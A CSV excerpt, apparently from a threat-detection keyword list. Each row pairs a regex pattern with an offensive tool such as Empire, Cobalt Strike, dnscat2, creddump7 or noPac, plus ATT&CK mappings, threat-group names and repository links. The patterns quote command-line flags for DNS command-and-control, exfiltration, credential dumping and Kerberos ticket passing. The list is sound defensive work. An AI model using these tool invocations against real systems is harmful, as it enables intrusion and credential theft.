"* dll-installer.ps1*",".{0,1000}\sdll\-installer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","872"
"* -DllName * -FunctionName *",".{0,1000}\s\-DllName\s.{0,1000}\s\-FunctionName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-BypassUACTokenManipulation.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","873"
"* --dns domain=skullseclabs.org*",".{0,1000}\s\-\-dns\sdomain\=skullseclabs\.org.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#content #linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","874"
"* -dns_stager_prepend *",".{0,1000}\s\-dns_stager_prepend\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","875"
"* -dns_stager_subhost *",".{0,1000}\s\-dns_stager_subhost\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","876"
"* DNS-Black-CAT Server *",".{0,1000}\sDNS\-Black\-CAT\sServer\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","877"
"* dns-blacklist.nse*",".{0,1000}\sdns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","878"
"* dns-brute.nse*",".{0,1000}\sdns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","879"
"* dns-cache-snoop.nse*",".{0,1000}\sdns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","880"
"* dnscan.py*",".{0,1000}\sdnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","881"
"* dns-check-zone.nse*",".{0,1000}\sdns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","882"
"* dnschef.exe*",".{0,1000}\sdnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","883"
"* dnschef.py*",".{0,1000}\sdnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","884"
"* dns-client-subnet-scan.nse*",".{0,1000}\sdns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","885"
"* dnscrypt-proxy*",".{0,1000}\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","886"
"* --dnsdump *",".{0,1000}\s\-\-dnsdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","887"
"* dnsdump.py*",".{0,1000}\sdnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","888"
"* dns-fuzz.nse*",".{0,1000}\sdns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","889"
"* dns-ip6-arpa-scan.nse*",".{0,1000}\sdns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","890"
"* dnskire:dnskire *",".{0,1000}\sdnskire\:dnskire\s.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","891"
"* dnslog-cn.nse*",".{0,1000}\sdnslog\-cn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","892"
"* dns-nsec3-enum.nse*",".{0,1000}\sdns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","893"
"* dns-nsec-enum.nse*",".{0,1000}\sdns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","894"
"* dns-nsid.nse*",".{0,1000}\sdns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","895"
"* dns-random-srcport.nse*",".{0,1000}\sdns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","896"
"* dns-random-txid.nse*",".{0,1000}\sdns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","897"
"* dns-recursion.nse*",".{0,1000}\sdns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","898"
"* dns-service-discovery.nse*",".{0,1000}\sdns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","899"
"* dns-srv-enum.nse*",".{0,1000}\sdns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","900"
"* dnsstager.py*",".{0,1000}\sdnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","901"
"* -dns-tcp -nameserver * -dc-ip*",".{0,1000}\s\-dns\-tcp\s\-nameserver\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","902"
"* dns-update.nse*",".{0,1000}\sdns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","903"
"* dns-zeustracker.nse*",".{0,1000}\sdns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","904"
"* dns-zone-transfer.nse*",".{0,1000}\sdns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","905"
"* docker-version.nse*",".{0,1000}\sdocker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","906"
"* Do-Exfiltration.ps1*",".{0,1000}\sDo\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","907"
"* --doLocalAdminSessionEnum*",".{0,1000}\s\-\-doLocalAdminSessionEnum.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","908"
"* -domain * /dc * /service cifs /ptt*",".{0,1000}\s\-domain\s.{0,1000}\s\/dc\s.{0,1000}\s\/service\scifs\s\/ptt.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","909"
"* -Domain * -SMB1 *",".{0,1000}\s\-Domain\s.{0,1000}\s\-SMB1\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","910"
"* domainDumper*",".{0,1000}\sdomainDumper.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","911"
"* domainhunter *",".{0,1000}\sdomainhunter\s.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","912"
"* --domains ./domains.txt run*",".{0,1000}\s\-\-domains\s\.\/domains\.txt\srun.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","#linux","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","913"
"* DomainTrustRecon.ahk*",".{0,1000}\sDomainTrustRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","914"
"* domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","915"
